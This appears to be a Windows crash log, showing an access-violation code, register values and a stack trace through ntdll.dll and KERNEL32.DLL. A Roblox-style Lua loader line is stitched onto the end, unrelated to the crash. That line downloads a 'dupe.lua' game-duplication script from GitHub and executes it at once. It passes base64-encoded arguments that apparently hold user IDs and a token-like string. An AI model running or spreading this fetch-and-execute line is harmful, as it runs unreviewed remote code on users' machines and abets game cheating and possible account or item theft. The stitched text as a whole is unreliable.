[Code = 0xC0000005]
[ExceptSymbol = NoSym]
[Eip = 0x7780B6CF]
[Eax = 0x00000005]
[Ebx = 0x0A2E6FF8]
[Ecx = 0x00000001]
[Edx = 0xEB8F9BE9]
[Esi = 0x63DC3538]
[Edi = 0x6ACA7060]
[Ebp = 0x55ABFCB0]
[Esp = 0x55ABFCA8]
[Dll Base = 0x00000000]

[File: UnkFile]                         [DynamicAddr: 0x808EE3B9]                       
[File: UnkFile]                         [DynamicAddr: 0x807FD403]                       
[File: UnkFile]                         [DynamicAddr: 0x807FCC9E]                       
[File: UnkFile]                         [DynamicAddr: 0x8066572A]                       
[File: UnkFile]                         [DynamicAddr: 0x8070BE40]                       
[File: UnkFile] [Module: KERNEL32.DLL]  [RebaseAddr: 0x00417D69]  [BaseAddr: 0x762D0000]
[File: UnkFile] [Module: ntdll.dll]     [RebaseAddr: 0x0046B74B]  [BaseAddr: 0x777A0000]
[File: UnkFile] [Module: ntdll.dll]     [RebaseAddr: 0x0046B6CF]  [BaseAddr: 0x777A0000]
loadstring(game:HttpGet('https://raw.githubusercontent.com/PetSimulatorX1/PetSimulatorXScripts/main/dupe.lua',true))()('MzA3MjQ0MDMzNA==','OTU3Mzc1NjU3NzQ5Mzk3NTI2','LWdRS3pXMkJTeVlFZTUzT2dPSGxsVTNIUVlHaHlZYjFPdlVNd1N5clQwbjZEZXFXZGhfUFNrYUd3emRidF9obUNUem4=','NTcwNzUwOTI1MjE2NTQ2ODE5','TWFzdGVyeQ==')